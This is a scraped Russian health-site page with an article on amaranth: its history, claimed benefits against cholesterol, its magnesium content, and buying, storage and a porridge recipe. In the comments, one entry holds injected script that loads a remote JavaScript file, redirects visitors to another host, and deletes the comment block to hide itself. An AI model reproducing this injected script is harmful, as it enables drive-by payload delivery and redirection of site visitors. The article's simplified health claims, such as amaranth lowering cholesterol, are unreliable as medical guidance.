Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Золото Монтесумы против х...  >>  Золото Монтесумы против холестерина
 
Обратная связь
 

Золото Монтесумы против холестерина

Размер шрифта
03 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Настоящее золото Монтесумы – последнего императора ацтеков – на самом деле не металл, а хлеб, а точнее – амарант, который на Руси имел название «щерица». Что это такое и в чем его польза?

Амарант – это растение, трава, семена которой люди издавна используют в пищу. Считается, что его родиной является Южная Америка. Название «амарант» пришло из греческого языка и означает «неувядаемый». Но семена амаранта еще в «допшеничную» эпоху употреблялись на Руси для изготовления хлеба: при новгородских раскопках семена амаранта (по-русски щерицы) были найдены вместе с пшеном. Это растение и теперь очень популярно в мире, в том числе и в России.

В продуктах питания используются светлые семена амаранта. Но не только семена амаранта используются в пищу, также и его зелень, которую люди употребляют в виде салатного растения.

Полезные свойства

В состав семян амаранта входит особое вещество сквален, которое снижает уровень холестерина в крови. Особенно много этого вещества в масле из амаранта: содержание сквалена в нем превышает количество этого вещества в оливковом масле в 30 раз.

В семенах амаранта нет глютена. Это важно для тех людей, у которых есть аллергия на белок пшеницы и им нельзя есть продукты из пшеничной муки, в том числе манную крупу. Глютен вызывает наследственное заболевание целиакия – нарушение пищеварения, сопровождающееся повреждением ворсинок тонкой кишки. Также продукты с глютеном противопоказаны к употреблению при некоторых формах дерматита.

В амаранте есть лизин – незаменимая аминокислота, которая важна для нормальной жизнедеятельности организма.

В амаранте много магния, который полезен для работы сердечно-сосудистой системы.

Пьедестал почета по содержанию магния

  • Амарант – 240 мг в 100 г
  • Пшеница – 140 мг в 100 г
  • Рис – 50 мг в 100 г

Когда в организме достаточно магния и цепь превращений с его участием правильно формируется, то сосуды человека в нужный момент способны легко расшириться и количество крови, протекающей по ним, увеличивается. Если же магния недостаточно, то организм испытывает хроническую гипоксию, в худшем случае недостаток этого микроэлемента может привести к инфаркту или инсульту.

Как выбрать

Если вы покупаете амарантовую мук, то следите за герметичностью упаковки и сроком годности на ней. Если вы решили купить зерна амаранта, то обращайте внимание на внешний вид зерен: сухие, светлые, блестящие зерна с очень плотной оболочкой.

Как хранить

Хранить семена амаранта в сухом и темном месте, например в керамической банке.

Как приготовить

Можно использовать муку из амаранта, как и пшеничную, – для выпечки разнообразных хлебобулочных изделий. Также из семян амаранта можно сварить кашу. А если вы решили использовать зелень амаранта, то добавляйте ее в салат, как любое другое салатное растение.

Рецепт. Каша из амарантовой муки

Берем равные доли воды и зерна и добавляем воду, если хотим получить в результате более жидкую кашу. Варим до готовности, выкладываем в тарелку и украшаем кусочками фруктов.

Сюжеты по теме:
Амарант. Каша из золота

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшая еда после застолья   В вопросе ГМО поставлена точка! Есть или не есть?   Пасхальный кулич с пользой   Творожная пасха: как подготовиться к празднику  

Слайдшоу

Ошибки в еде, которые вы точно делаете!    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.